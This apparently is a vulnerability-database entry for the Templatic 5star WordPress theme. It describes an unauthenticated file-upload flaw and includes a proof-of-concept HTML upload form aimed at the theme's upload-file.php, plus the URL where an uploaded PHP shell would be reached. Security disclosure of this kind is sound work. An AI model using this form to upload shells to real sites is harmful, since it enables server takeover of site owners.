The 5star WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability.
<html> <body> <center> <form method="post" enctype="multipart/form-data" action="https://example.com/wp-content/themes/5star/Monetize/general/upload-file.php"> <input name="uploadfile[]" type="file" /> <input type="submit" value="upload" /> </form> </center> </body> </html> File Access: https://example.com/wp-content/themes/5star/images/tmp/your_shell.php
2014-08-01 (about 8 years ago)
2014-08-01 (about 8 years ago)
2021-01-13 (about 1 years ago)